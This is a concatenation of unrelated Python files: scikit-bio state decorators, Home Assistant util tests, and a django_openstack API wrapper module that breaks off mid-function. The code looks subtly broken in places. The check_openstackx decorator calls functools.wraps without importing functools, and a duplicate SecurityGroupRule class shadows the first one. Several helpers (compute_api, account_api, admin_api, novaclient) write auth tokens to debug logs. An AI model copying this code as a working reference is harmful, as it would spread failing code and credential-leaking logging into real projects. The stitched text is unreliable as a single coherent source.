                headers[i].get('X-Account-Host'),
                '%(ip)s:%(port)s' % account)
            headers[i]['X-Account-Device'] = csv_append(
                headers[i].get('X-Account-Device'),
                account['device'])
        return headers
| |
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
import warnings
import textwrap
import decorator
from ._exception import OverrideError
class _state_decorator(object):
    """ Base class for decorators of all public functionality.
    """

    # kwargs that a concrete decorator must receive (see _validate_kwargs).
    _required_kwargs = ()

    def _get_indentation_level(self, docstring_lines,
                               default_existing_docstring=4,
                               default_no_existing_docstring=0):
        """ Determine the level of indentation of the docstring to match it.

        Content after the first line of a docstring may be indented
        differently depending on nesting: for example, a top-level function
        usually indents its "Parameters" section four spaces, while a method
        nested in a class indents it eight. This returns the indentation of
        the first non-blank line following the initial summary line.
        """
        # No docstring at all: use the corresponding default.
        if not docstring_lines:
            return default_no_existing_docstring
        # Single-line docstring: use the corresponding default.
        if len(docstring_lines) == 1:
            return default_existing_docstring
        # Otherwise report the leading-space count of the first non-blank
        # line after the summary.
        for line in docstring_lines[1:]:
            if line.strip():
                return len(line) - len(line.lstrip())
        # Only whitespace followed the summary line.
        return default_existing_docstring

    def _update_docstring(self, docstring, state_desc,
                          state_desc_prefix='State: '):
        # With no existing docstring, the state note becomes the docstring.
        if docstring is None:
            return '%s%s' % (state_desc_prefix, state_desc)
        lines = docstring.split('\n')
        indent = self._get_indentation_level(lines)
        # Wrap at 79 characters, accounting for the indentation and the
        # prefix that start the first state-description line.
        prefix_len = len(state_desc_prefix)
        wrapped = textwrap.wrap(state_desc, 79 - (indent + prefix_len))
        # The first line carries the prefix; continuation lines are padded
        # so the text aligns, matching numpydoc's formatting of deprecation
        # notices (which use the note Sphinx directive).
        first = '%s%s%s' % (' ' * indent, state_desc_prefix, wrapped[0])
        continuation_pad = ' ' * (indent + prefix_len)
        rest = ['%s%s' % (continuation_pad, line) for line in wrapped[1:]]
        lines[0] = '%s\n\n%s' % (lines[0], '\n'.join([first] + rest))
        return '\n'.join(lines)

    def _validate_kwargs(self, **kwargs):
        for required_kwarg in self._required_kwargs:
            if required_kwarg not in kwargs:
                raise ValueError('%s decorator requires parameter: %s' %
                                 (self.__class__, required_kwarg))
class stable(_state_decorator):
    """ State decorator indicating stable functionality.

    Marks public functionality as ``stable``: its API will stay backward
    compatible unless and until it is deprecated. Applying this decorator
    updates the docstring to record the first scikit-bio release in which
    the functionality was considered stable.

    Parameters
    ----------
    as_of : str
        First release version where functionality is considered to be stable.

    See Also
    --------
    experimental
    deprecated

    Examples
    --------
    >>> @stable(as_of='0.3.0')
    ... def f_stable():
    ...     \"\"\" An example stable function.
    ...     \"\"\"
    ...     pass
    >>> help(f_stable)
    Help on function f_stable in module skbio.util._decorator:
    <BLANKLINE>
    f_stable()
    An example stable function.
    <BLANKLINE>
    State: Stable as of 0.3.0.
    <BLANKLINE>

    """

    _required_kwargs = ('as_of', )

    def __init__(self, *args, **kwargs):
        self._validate_kwargs(**kwargs)
        self.as_of = kwargs['as_of']

    def __call__(self, func):
        # Record the stability milestone in the decorated object's docstring.
        func.__doc__ = self._update_docstring(
            func.__doc__, 'Stable as of %s.' % self.as_of)
        return func
class experimental(_state_decorator):
    """ State decorator indicating experimental functionality.

    Marks public functionality as experimental: its API is subject to change
    or removal with little or (rarely) no warning. Applying this decorator
    updates the docstring to record the first scikit-bio release in which
    the functionality was considered experimental.

    Parameters
    ----------
    as_of : str
        First release version where feature is considered to be experimental.

    See Also
    --------
    stable
    deprecated

    Examples
    --------
    >>> @experimental(as_of='0.3.0')
    ... def f_experimental():
    ...     \"\"\" An example experimental function.
    ...     \"\"\"
    ...     pass
    >>> help(f_experimental)
    Help on function f_experimental in module skbio.util._decorator:
    <BLANKLINE>
    f_experimental()
    An example experimental function.
    <BLANKLINE>
    State: Experimental as of 0.3.0.
    <BLANKLINE>

    """

    _required_kwargs = ('as_of', )

    def __init__(self, *args, **kwargs):
        self._validate_kwargs(**kwargs)
        self.as_of = kwargs['as_of']

    def __call__(self, func):
        # Record the experimental milestone in the decorated object's
        # docstring.
        func.__doc__ = self._update_docstring(
            func.__doc__, 'Experimental as of %s.' % self.as_of)
        return func
class deprecated(_state_decorator):
    """ State decorator indicating deprecated functionality.

    Used to indicate that a public class or function is deprecated, meaning
    that its API will be removed in a future version of scikit-bio. Decorating
    functionality as deprecated will update its doc string to indicate the
    first version of scikit-bio when the functionality was deprecated, the
    first version of scikit-bio when the functionality will no longer exist,
    and the reason for deprecation of the API. It will also cause calls to the
    API to raise a ``DeprecationWarning``.

    Parameters
    ----------
    as_of : str
        First development version where feature is considered to be deprecated.
    until : str
        First release version where feature will no longer exist.
    reason : str
        Brief description of why the API is deprecated.

    See Also
    --------
    stable
    experimental

    Examples
    --------
    >>> @deprecated(as_of='0.3.0', until='0.3.3',
    ...             reason='Use skbio.g().')
    ... def f_deprecated(x, verbose=False):
    ...     \"\"\" An example deprecated function.
    ...     \"\"\"
    ...     pass
    >>> help(f_deprecated)
    Help on function f_deprecated in module skbio.util._decorator:
    <BLANKLINE>
    f_deprecated(x, verbose=False)
    An example deprecated function.
    <BLANKLINE>
    .. note:: Deprecated as of 0.3.0 for removal in 0.3.3. Use skbio.g().
    <BLANKLINE>

    """

    _required_kwargs = ('as_of', 'until', 'reason')

    def __init__(self, *args, **kwargs):
        self._validate_kwargs(**kwargs)
        self.as_of = kwargs['as_of']
        self.until = kwargs['until']
        self.reason = kwargs['reason']

    def __call__(self, func, *args, **kwargs):
        state_desc = 'Deprecated as of %s for removal in %s. %s' %\
            (self.as_of, self.until, self.reason)
        func.__doc__ = self._update_docstring(func.__doc__, state_desc,
                                              state_desc_prefix='.. note:: ')

        def wrapped_f(*args, **kwargs):
            warnings.warn('%s is deprecated as of scikit-bio version %s, and '
                          'will be removed in version %s. %s' %
                          (func.__name__, self.as_of, self.until, self.reason),
                          DeprecationWarning)
            # args[0] is the function being wrapped when this is called
            # after wrapping with decorator.decorator: the decorator
            # package's convention is to invoke the caller as
            # caller(func, *args, **kwargs), so the decorated function is
            # prepended and must be skipped when forwarding.
            return func(*args[1:], **kwargs)

        # decorator.decorator preserves func's signature on the wrapper.
        return decorator.decorator(wrapped_f, func)
# Adapted from http://stackoverflow.com/a/8313042/579416
def overrides(interface_class):
    """Decorator for class-level members.

    Used to indicate that a member is being overridden from a specific parent
    class. If the member does not have a docstring, it will pull one from the
    parent class. When chaining decorators, this should be first as it is
    relatively nondestructive.

    Parameters
    ----------
    interface_class : class
        The class which has a member overridden by the decorated member.

    Returns
    -------
    function
        The function is not changed or replaced.

    Raises
    ------
    OverrideError
        If the `interface_class` does not possess a member of the same name
        as the decorated member.

    """
    def overrider(method):
        if method.__name__ not in dir(interface_class):
            raise OverrideError("%r is not present in parent class: %r." %
                                (method.__name__, interface_class.__name__))
        # Temporarily neuter classproperty's descriptor protocol so that the
        # getattr below returns the descriptor object itself (whose __doc__
        # we want to copy) instead of invoking the property on the class.
        backup = classproperty.__get__
        classproperty.__get__ = lambda x, y, z: x
        if method.__doc__ is None:
            method.__doc__ = getattr(interface_class, method.__name__).__doc__
        # Restore normal classproperty behavior.
        classproperty.__get__ = backup
        return method
    return overrider
class classproperty(property):
    """Decorator for class-level properties.

    Supports read access only. The property will be read-only within an
    instance. However, the property can always be redefined on the class,
    since Python classes are mutable.

    Parameters
    ----------
    func : function
        Method to make a class property.

    Returns
    -------
    property
        Decorated method.

    Raises
    ------
    AttributeError
        If the property is set on an instance.

    """
    def __init__(self, func):
        # Wrap the getter as a classmethod so it receives the class, then
        # let ``property`` hold it; preserve the function's metadata.
        original_name = func.__name__
        original_doc = func.__doc__
        super(classproperty, self).__init__(classmethod(func))
        self.__name__ = original_name
        self.__doc__ = original_doc

    def __get__(self, cls, owner):
        # Bind the stored classmethod to the owning class and invoke it.
        bound_getter = self.fget.__get__(None, owner)
        return bound_getter()

    def __set__(self, obj, value):
        raise AttributeError("can't set attribute")
class classonlymethod(classmethod):
    """Just like `classmethod`, but it can't be called on an instance."""

    def __init__(self, function):
        super(classonlymethod, self).__init__(function)

    def __get__(self, obj, cls=None):
        # Accessing through an instance (obj is not None) is an error; the
        # method is only meaningful on the class itself.
        if obj is not None:
            raise TypeError("Class-only method called on an instance. Use"
                            " '%s.%s' instead."
                            % (cls.__name__, self.__func__.__name__))
        # Build a plain function that forwards to the underlying function
        # with the class pre-bound as its first argument, while presenting
        # a signature with that first argument removed (via
        # FunctionMakerDropFirstArg).
        evaldict = self.__func__.__globals__.copy()
        evaldict['_call_'] = self.__func__
        evaldict['_cls_'] = cls
        fun = FunctionMakerDropFirstArg.create(
            self.__func__, "return _call_(_cls_, %(shortsignature)s)",
            evaldict, __wrapped__=self.__func__)
        fun.__func__ = self.__func__  # Doctests need the original function
        return fun
class FunctionMakerDropFirstArg(decorator.FunctionMaker):
    """FunctionMaker whose generated signatures omit the first argument.

    Used by ``classonlymethod`` so the exposed function's signature does
    not include the implicitly-bound class argument.
    """
    def __init__(self, *args, **kwargs):
        super(FunctionMakerDropFirstArg, self).__init__(*args, **kwargs)
        for attr in ('signature', 'shortsignature'):
            setattr(self, attr, self._remove_first_arg(getattr(self, attr)))

    def _remove_first_arg(self, string):
        # Drop everything through the first comma, then the following space.
        _first, _comma, remainder = string.partition(',')
        return remainder[1:]
| |
"""
tests.test_util
~~~~~~~~~~~~~~~~~
Tests Home Assistant util methods.
"""
# pylint: disable=too-many-public-methods
import unittest
import time
from datetime import datetime, timedelta
import homeassistant.util as util
class TestUtil(unittest.TestCase):
    """ Tests util methods. """

    def test_sanitize_filename(self):
        """ Test sanitize_filename. """
        # Path separators and traversal components must be stripped.
        self.assertEqual("test", util.sanitize_filename("test"))
        self.assertEqual("test", util.sanitize_filename("/test"))
        self.assertEqual("test", util.sanitize_filename("..test"))
        self.assertEqual("test", util.sanitize_filename("\\test"))
        self.assertEqual("test", util.sanitize_filename("\\../test"))

    def test_sanitize_path(self):
        """ Test sanitize_path. """
        self.assertEqual("test/path", util.sanitize_path("test/path"))
        self.assertEqual("test/path", util.sanitize_path("~test/path"))
        self.assertEqual("//test/path",
                         util.sanitize_path("~/../test/path"))

    def test_slugify(self):
        """ Test slugify. """
        self.assertEqual("Test", util.slugify("T-!@#$!#@$!$est"))
        self.assertEqual("Test_More", util.slugify("Test More"))
        self.assertEqual("Test_More", util.slugify("Test_(More)"))

    def test_split_entity_id(self):
        """ Test split_entity_id. """
        self.assertEqual(['domain', 'object_id'],
                         util.split_entity_id('domain.object_id'))

    def test_repr_helper(self):
        """ Test repr_helper. """
        self.assertEqual("A", util.repr_helper("A"))
        self.assertEqual("5", util.repr_helper(5))
        self.assertEqual("True", util.repr_helper(True))
        self.assertEqual("test=1",
                         util.repr_helper({"test": 1}))
        self.assertEqual("12:00:00 09-07-1986",
                         util.repr_helper(datetime(1986, 7, 9, 12, 0, 0)))

    def test_convert(self):
        """ Test convert. """
        self.assertEqual(5, util.convert("5", int))
        self.assertEqual(5.0, util.convert("5", float))
        self.assertEqual(True, util.convert("True", bool))
        # Falls back to the default on conversion failure or None input.
        self.assertEqual(1, util.convert("NOT A NUMBER", int, 1))
        self.assertEqual(1, util.convert(None, int, 1))

    def test_ensure_unique_string(self):
        """ Test ensure_unique_string. """
        self.assertEqual(
            "Beer_3",
            util.ensure_unique_string("Beer", ["Beer", "Beer_2"]))
        self.assertEqual(
            "Beer",
            util.ensure_unique_string("Beer", ["Wine", "Soda"]))

    def test_ordered_enum(self):
        """ Test the ordered enum class. """

        class TestEnum(util.OrderedEnum):
            """ Test enum that can be ordered. """
            FIRST = 1
            SECOND = 2
            THIRD = 3

        self.assertTrue(TestEnum.SECOND >= TestEnum.FIRST)
        self.assertTrue(TestEnum.SECOND >= TestEnum.SECOND)
        self.assertFalse(TestEnum.SECOND >= TestEnum.THIRD)

        self.assertTrue(TestEnum.SECOND > TestEnum.FIRST)
        self.assertFalse(TestEnum.SECOND > TestEnum.SECOND)
        self.assertFalse(TestEnum.SECOND > TestEnum.THIRD)

        self.assertFalse(TestEnum.SECOND <= TestEnum.FIRST)
        self.assertTrue(TestEnum.SECOND <= TestEnum.SECOND)
        self.assertTrue(TestEnum.SECOND <= TestEnum.THIRD)

        self.assertFalse(TestEnum.SECOND < TestEnum.FIRST)
        self.assertFalse(TestEnum.SECOND < TestEnum.SECOND)
        self.assertTrue(TestEnum.SECOND < TestEnum.THIRD)

        # Python will raise a TypeError if the <, <=, >, >= methods
        # raise a NotImplemented error.
        self.assertRaises(TypeError,
                          lambda x, y: x < y, TestEnum.FIRST, 1)

        self.assertRaises(TypeError,
                          lambda x, y: x <= y, TestEnum.FIRST, 1)

        self.assertRaises(TypeError,
                          lambda x, y: x > y, TestEnum.FIRST, 1)

        self.assertRaises(TypeError,
                          lambda x, y: x >= y, TestEnum.FIRST, 1)

    def test_ordered_set(self):
        # OrderedSet must preserve insertion order while supporting the
        # usual set operations.
        set1 = util.OrderedSet([1, 2, 3, 4])
        set2 = util.OrderedSet([3, 4, 5])

        self.assertEqual(4, len(set1))
        self.assertEqual(3, len(set2))

        self.assertIn(1, set1)
        self.assertIn(2, set1)
        self.assertIn(3, set1)
        self.assertIn(4, set1)
        self.assertNotIn(5, set1)

        self.assertNotIn(1, set2)
        self.assertNotIn(2, set2)
        self.assertIn(3, set2)
        self.assertIn(4, set2)
        self.assertIn(5, set2)

        set1.add(5)
        self.assertIn(5, set1)

        set1.discard(5)
        self.assertNotIn(5, set1)

        # Try again while key is not in
        set1.discard(5)
        self.assertNotIn(5, set1)

        self.assertEqual([1, 2, 3, 4], list(set1))
        self.assertEqual([4, 3, 2, 1], list(reversed(set1)))

        # pop(False) pops from the front, pop() from the back.
        self.assertEqual(1, set1.pop(False))
        self.assertEqual([2, 3, 4], list(set1))

        self.assertEqual(4, set1.pop())
        self.assertEqual([2, 3], list(set1))

        self.assertEqual('OrderedSet()', str(util.OrderedSet()))
        self.assertEqual('OrderedSet([2, 3])', str(set1))

        # Equality with another OrderedSet is order-sensitive; equality
        # with plain sets/lists is membership-based.
        self.assertEqual(set1, util.OrderedSet([2, 3]))
        self.assertNotEqual(set1, util.OrderedSet([3, 2]))
        self.assertEqual(set1, set([2, 3]))
        self.assertEqual(set1, {3, 2})
        self.assertEqual(set1, [2, 3])
        self.assertEqual(set1, [3, 2])
        self.assertNotEqual(set1, {2})

        set3 = util.OrderedSet(set1)
        set3.update(set2)

        self.assertEqual([3, 4, 5, 2], set3)
        self.assertEqual([3, 4, 5, 2], set1 | set2)
        self.assertEqual([3], set1 & set2)
        self.assertEqual([2], set1 - set2)

        set1.update([1, 2], [5, 6])
        self.assertEqual([2, 3, 1, 5, 6], set1)

    def test_throttle(self):
        """ Test the add cooldown decorator. """
        calls1 = []

        @util.Throttle(timedelta(milliseconds=500))
        def test_throttle1():
            calls1.append(1)

        calls2 = []

        # Second interval is the no_throttle re-arm window.
        @util.Throttle(
            timedelta(milliseconds=500), timedelta(milliseconds=250))
        def test_throttle2():
            calls2.append(1)

        # Ensure init is ok
        self.assertEqual(0, len(calls1))
        self.assertEqual(0, len(calls2))

        # Call first time and ensure methods got called
        test_throttle1()
        test_throttle2()

        self.assertEqual(1, len(calls1))
        self.assertEqual(1, len(calls2))

        # Call second time. Methods should not get called
        test_throttle1()
        test_throttle2()

        self.assertEqual(1, len(calls1))
        self.assertEqual(1, len(calls2))

        # Call again, overriding throttle, only first one should fire
        test_throttle1(no_throttle=True)
        test_throttle2(no_throttle=True)

        self.assertEqual(2, len(calls1))
        self.assertEqual(1, len(calls2))

        # Sleep past the no throttle interval for throttle2
        time.sleep(.3)

        test_throttle1()
        test_throttle2()

        self.assertEqual(2, len(calls1))
        self.assertEqual(1, len(calls2))

        test_throttle1(no_throttle=True)
        test_throttle2(no_throttle=True)

        self.assertEqual(3, len(calls1))
        self.assertEqual(2, len(calls2))

        time.sleep(.5)

        test_throttle1()
        test_throttle2()

        self.assertEqual(4, len(calls1))
        self.assertEqual(3, len(calls2))
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2011 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Methods and interface objects used to interact with external apis.
API method calls return objects that are in many cases objects with
attributes that are direct maps to the data returned from the API http call.
Unfortunately, these objects are also often constructed dynamically, making
it difficult to know what data is available from the API object. Because of
this, all API calls should wrap their returned object in one defined here,
using only explicitly defined atributes and/or methods.
In other words, django_openstack developers not working on django_openstack.api
shouldn't need to understand the finer details of APIs for Nova/Glance/Swift et
al.
"""
import httplib
import json
import logging
import urlparse
from django.conf import settings
from django.contrib import messages
import cloudfiles
import openstack.compute
import openstackx.admin
import openstackx.api.exceptions as api_exceptions
import openstackx.extras
import openstackx.auth
from glance import client as glance_client
from glance.common import exception as glance_exceptions
from novaclient import client as base_nova_client
from novaclient.v1_1 import client as nova_client
from quantum import client as quantum_client
LOG = logging.getLogger('django_openstack.api')
class APIResourceWrapper(object):
    """ Simple wrapper for api objects

        Define _attrs on the child class and pass in the
        api object as the only argument to the constructor
    """
    _attrs = []

    def __init__(self, apiresource):
        self._apiresource = apiresource

    def __getattr__(self, attr):
        # Only names whitelisted in _attrs are forwarded to the wrapped
        # resource; anything else is logged and rejected.
        if attr not in self._attrs:
            LOG.debug('Attempted to access unknown attribute "%s" on'
                      ' APIResource object of type "%s" wrapping resource of'
                      ' type "%s"' % (attr, self.__class__,
                                      self._apiresource.__class__))
            raise AttributeError(attr)
        # __getattr__ won't find properties
        return self._apiresource.__getattribute__(attr)
class APIDictWrapper(object):
    """ Simple wrapper for api dictionaries

        Some api calls return dictionaries.  This class provides identical
        behavior as APIResourceWrapper, except that it will also behave as a
        dictionary, in addition to attribute accesses.

        Attribute access is the preferred method of access, to be
        consistent with api resource objects from openstackx
    """
    # Default so that a direct instance (or a subclass that forgets to
    # declare _attrs) raises a clean AttributeError in __getattr__ instead
    # of recursing infinitely while looking up self._attrs.
    _attrs = []

    def __init__(self, apidict):
        self._apidict = apidict

    def __getattr__(self, attr):
        # Forward whitelisted names to the wrapped dict; a missing key
        # surfaces as AttributeError to match attribute semantics.
        if attr in self._attrs:
            try:
                return self._apidict[attr]
            except KeyError as e:
                raise AttributeError(e)
        else:
            LOG.debug('Attempted to access unknown item "%s" on'
                      'APIResource object of type "%s"'
                      % (attr, self.__class__))
            raise AttributeError(attr)

    def __getitem__(self, item):
        try:
            return self.__getattr__(item)
        except AttributeError as e:
            # caller is expecting a KeyError
            raise KeyError(e)

    def get(self, item, default=None):
        """Dict-style get: return `default` when the item is unavailable."""
        try:
            return self.__getattr__(item)
        except AttributeError:
            return default
# Thin declarative wrappers: each class only whitelists the attributes
# exposed from the corresponding api object via APIResourceWrapper.
class Container(APIResourceWrapper):
    """Simple wrapper around cloudfiles.container.Container"""
    _attrs = ['name']


class Console(APIResourceWrapper):
    """Simple wrapper around openstackx.extras.consoles.Console"""
    _attrs = ['id', 'output', 'type']


class Flavor(APIResourceWrapper):
    """Simple wrapper around openstackx.admin.flavors.Flavor"""
    _attrs = ['disk', 'id', 'links', 'name', 'ram', 'vcpus']


class FloatingIp(APIResourceWrapper):
    """Simple wrapper for floating ips"""
    _attrs = ['ip', 'fixed_ip', 'instance_id', 'id']
class Image(APIDictWrapper):
    """Wrapper for a glance image dictionary.

    The nested 'properties' dict is handed back wrapped in
    ImageProperties so it too supports attribute access.
    """
    _attrs = ['checksum', 'container_format', 'created_at', 'deleted',
              'deleted_at', 'disk_format', 'id', 'is_public', 'location',
              'name', 'properties', 'size', 'status', 'updated_at', 'owner']

    def __getattr__(self, attrname):
        value = super(Image, self).__getattr__(attrname)
        if attrname == "properties":
            return ImageProperties(value)
        return value
# Returned by Image.__getattr__ for the nested 'properties' dict.
class ImageProperties(APIDictWrapper):
    """Simple wrapper around glance image properties dictionary"""
    _attrs = ['architecture', 'image_location', 'image_state', 'kernel_id',
              'project_id', 'ramdisk_id']


class KeyPair(APIResourceWrapper):
    """Simple wrapper around openstackx.extras.keypairs.Keypair"""
    _attrs = ['fingerprint', 'name', 'private_key']
class Server(APIResourceWrapper):
    """ Simple wrapper around openstackx.extras.server.Server

    Preserves the request info so image name can later be retrieved.
    """
    _attrs = ['addresses', 'attrs', 'hostId', 'id', 'image', 'links',
              'metadata', 'name', 'private_ip', 'public_ip', 'status', 'uuid',
              'image_name', 'VirtualInterfaces']

    def __init__(self, apiresource, request):
        super(Server, self).__init__(apiresource)
        # Kept so image_name can issue a glance call later on.
        self.request = request

    def __getattr__(self, attr):
        if attr == "attrs":
            # Wrap the raw attrs dict for attribute-style access.
            return ServerAttributes(super(Server, self).__getattr__(attr))
        else:
            return super(Server, self).__getattr__(attr)

    @property
    def image_name(self):
        # Resolve the image name via glance; the image may have been
        # deleted since the server was booted.
        try:
            image = image_get(self.request, self.image['id'])
            return image.name
        except glance_exceptions.NotFound:
            return "(not found)"

    def reboot(self, hardness=openstack.compute.servers.REBOOT_HARD):
        # Hard reboot by default, matching the compute api's constant.
        compute_api(self.request).servers.reboot(self.id, hardness)
class ServerAttributes(APIDictWrapper):
    """Wrapper around the 'attrs' dictionary of an openstackx Server.

    Returned by Server.__getattr__ for the 'attrs' key.
    """
    _attrs = ['description', 'disk_gb', 'host', 'image_ref', 'kernel_id',
              'key_name', 'launched_at', 'mac_address', 'memory_mb', 'name',
              'os_type', 'tenant_id', 'ramdisk_id', 'scheduled_at',
              'terminated_at', 'user_data', 'user_id', 'vcpus', 'hostname',
              'security_groups']
class Services(APIResourceWrapper):
    """Simple wrapper around service records returned by the admin api."""
    _attrs = ['disabled', 'host', 'id', 'last_update', 'stats', 'type', 'up',
              'zone']


class SwiftObject(APIResourceWrapper):
    """Simple wrapper around a cloudfiles storage object."""
    _attrs = ['name']


class Tenant(APIResourceWrapper):
    """Simple wrapper around openstackx.auth.tokens.Tenant"""
    _attrs = ['id', 'description', 'enabled', 'name']
class Token(object):
    """A keystone token together with the user/catalog info returned
    alongside it."""

    def __init__(self, id=None, serviceCatalog=None, tenant_id=None, user=None):
        self.id = id
        self.tenant_id = tenant_id
        # Falsy catalog/user values collapse to fresh empty dicts.
        self.serviceCatalog = serviceCatalog if serviceCatalog else {}
        self.user = user if user else {}
class Usage(APIResourceWrapper):
    """Simple wrapper around openstackx.extras.usage.Usage"""
    _attrs = ['begin', 'instances', 'stop', 'tenant_id',
              'total_active_disk_size', 'total_active_instances',
              'total_active_ram_size', 'total_active_vcpus', 'total_cpu_usage',
              'total_disk_usage', 'total_hours', 'total_ram_usage']


class User(APIResourceWrapper):
    """Simple wrapper around openstackx.extras.users.User"""
    _attrs = ['email', 'enabled', 'id', 'tenantId', 'name']


class Role(APIResourceWrapper):
    """Wrapper around user role"""
    _attrs = ['id', 'name', 'description', 'service_id']


class SecurityGroup(APIResourceWrapper):
    """Simple wrapper around openstackx.extras.security_groups.SecurityGroup"""
    _attrs = ['id', 'name', 'description', 'tenant_id', 'rules']


class SecurityGroupRule(APIResourceWrapper):
    """Simple wrapper around openstackx.extras.security_groups.SecurityGroupRule"""
    _attrs = ['id', 'parent_group_id', 'group_id', 'ip_protocol',
              'from_port', 'to_port', 'groups', 'ip_ranges']


# NOTE(review): this second definition SHADOWS the SecurityGroupRule above,
# and its attribute list looks like a security *group* rather than a rule;
# the docstring ("users.User") appears to be a copy-paste error.  Confirm
# which definition is intended before relying on either.
class SecurityGroupRule(APIResourceWrapper):
    """Simple wrapper around openstackx.extras.users.User"""
    _attrs = ['id', 'name', 'description', 'tenant_id', 'security_group_rules']
class SwiftAuthentication(object):
    """Pre-authenticated credentials for cloudfiles.

    Carries the storage URL and auth token taken from the session, so
    connecting never performs a fresh authentication round-trip.
    """

    def __init__(self, storage_url, auth_token):
        self.storage_url = storage_url
        self.auth_token = auth_token

    def authenticate(self):
        # Shape expected by cloudfiles: (storage_url, cdn_url, token);
        # no CDN url is supplied here.
        return (self.storage_url, '', self.auth_token)
class ServiceCatalogException(api_exceptions.ApiException):
    """Raised when a service (or its endpoint) is missing from the
    user's service catalog; reported as a 404."""
    def __init__(self, service_name):
        message = 'Invalid service catalog service: %s' % service_name
        super(ServiceCatalogException, self).__init__(404, message)


class VirtualInterface(APIResourceWrapper):
    """Simple wrapper around a virtual interface record."""
    _attrs = ['id', 'mac_address']
def get_service_from_catalog(catalog, service_type):
    """Return the first catalog entry whose 'type' matches, else None."""
    matches = (entry for entry in catalog if entry['type'] == service_type)
    return next(matches, None)
def url_for(request, service_type, admin=False):
    """Look up an endpoint URL for *service_type* in the user's catalog.

    Uses the first endpoint of the matching service; returns its adminURL
    when *admin* is true, its internalURL otherwise.  Raises
    ServiceCatalogException when the service or endpoint key is missing.
    """
    catalog = request.user.service_catalog
    service = get_service_from_catalog(catalog, service_type)
    if not service:
        raise ServiceCatalogException(service_type)
    key = 'adminURL' if admin else 'internalURL'
    try:
        return service['endpoints'][0][key]
    except (IndexError, KeyError):
        raise ServiceCatalogException(service_type)
def check_openstackx(f):
    """Decorator that adds extra info to api exceptions

    The dashboard currently depends on openstackx extensions being present
    in nova.  Error messages for views depending on these extensions do not
    otherwise lead to the conclusion that nova is missing extensions.

    This decorator should be dropped and removed after keystone and
    dashboard more gracefully handle extensions and openstackx extensions
    aren't required by the dashboard in nova.
    """
    # functools.wraps preserves f's name/docstring on the wrapper (the
    # original decorator hid them behind 'inner').
    @functools.wraps(f)
    def inner(*args, **kwargs):
        try:
            return f(*args, **kwargs)
        except api_exceptions.NotFound as e:
            # Annotate the exception in place, then let it propagate.
            e.message = e.details or ''
            e.message += ' This error may be caused by a misconfigured' \
                         ' nova url in keystone\'s service catalog, or ' \
                         ' by missing openstackx extensions in nova. ' \
                         ' See the dashboard README.'
            raise
    return inner
def compute_api(request):
    """Build an openstack.compute client from the request's token.

    The token and compute url were previously recomputed three times
    each; they are hoisted into locals here.
    """
    token = request.user.token
    compute_url = url_for(request, 'compute')
    compute = openstack.compute.Compute(auth_token=token,
                                        management_url=compute_url)
    # this below hack is necessary to make the jacobian compute client work
    # TODO(mgius): It looks like this is unused now?
    compute.client.auth_token = token
    compute.client.management_url = compute_url
    LOG.debug('compute_api connection created using token "%s"'
              ' and url "%s"' % (token, compute_url))
    return compute
def account_api(request):
    """Build an openstackx Account client against the admin identity url."""
    token = request.user.token
    # Hoisted: the url lookup was previously performed twice (log + client).
    admin_url = url_for(request, 'identity', True)
    LOG.debug('account_api connection created using token "%s"'
              ' and url "%s"' % (token, admin_url))
    return openstackx.extras.Account(auth_token=token,
                                     management_url=admin_url)
def glance_api(request):
    """Build a glance client from the image endpoint in the catalog."""
    endpoint = urlparse.urlparse(url_for(request, 'image'))
    LOG.debug('glance_api connection created for host "%s:%d"' %
              (endpoint.hostname, endpoint.port))
    return glance_client.Client(endpoint.hostname, endpoint.port,
                                auth_tok=request.user.token)
def admin_api(request):
    """Build an openstackx Admin client against the admin compute url."""
    token = request.user.token
    # Hoisted: the url lookup was previously performed twice (log + client).
    admin_url = url_for(request, 'compute', True)
    LOG.debug('admin_api connection created using token "%s"'
              ' and url "%s"' % (token, admin_url))
    return openstackx.admin.Admin(auth_token=token,
                                  management_url=admin_url)
def extras_api(request):
    """Build an openstackx Extras client for the compute endpoint."""
    token = request.user.token
    # Hoisted: the url lookup was previously performed twice (log + client).
    compute_url = url_for(request, 'compute')
    LOG.debug('extras_api connection created using token "%s"'
              ' and url "%s"' % (token, compute_url))
    return openstackx.extras.Extras(auth_token=token,
                                    management_url=compute_url)
def _get_base_client_from_token(tenant_id, token):
    '''
    Helper function to create an instance of novaclient.client.HTTPClient from
    a token and tenant id rather than a username/password.

    The returned client can be passed to novaclient.keystone.client.Client
    without requiring a second authentication call.

    NOTE(gabriel): This ought to live upstream in novaclient, but isn't
    currently supported by the HTTPClient.authenticate() method (which only
    works with a username and password).
    '''
    # No username/password (first two args): we authenticate with the
    # token itself via the request below.
    c = base_nova_client.HTTPClient(None, None, tenant_id,
                                    settings.OPENSTACK_KEYSTONE_URL)
    # Keystone v2-style token-scoped auth body.
    body = {"auth": {"tenantId": tenant_id, "token": {"id": token}}}
    token_url = urlparse.urljoin(c.auth_url, "tokens")
    resp, body = c.request(token_url, "POST", body=body)
    # Populates c.service_catalog from the auth response (used by callers
    # such as token_create_scoped below).
    c._extract_service_catalog(c.auth_url, resp, body)
    return c
def novaclient(request):
    """Build a novaclient v1.1 client authenticated via the user's token.

    The compute url was previously looked up three times; hoisted here.
    """
    token = request.user.token
    compute_url = url_for(request, 'compute')
    LOG.debug('novaclient connection created using token "%s"'
              ' and url "%s"' % (token, compute_url))
    c = nova_client.Client(username=request.user.username,
                           api_key=token,
                           project_id=request.user.tenant_id,
                           auth_url=compute_url)
    # Inject the existing token/url so no re-authentication is needed.
    c.client.auth_token = token
    c.client.management_url = compute_url
    return c
def auth_api():
    """Build an openstackx Auth client pointed at the keystone url."""
    keystone_url = settings.OPENSTACK_KEYSTONE_URL
    LOG.debug('auth_api connection created using url "%s"' % keystone_url)
    return openstackx.auth.Auth(management_url=keystone_url)
def swift_api(request):
    """Build a cloudfiles connection using the session's swift token.

    The session token and object-store url were each read twice before;
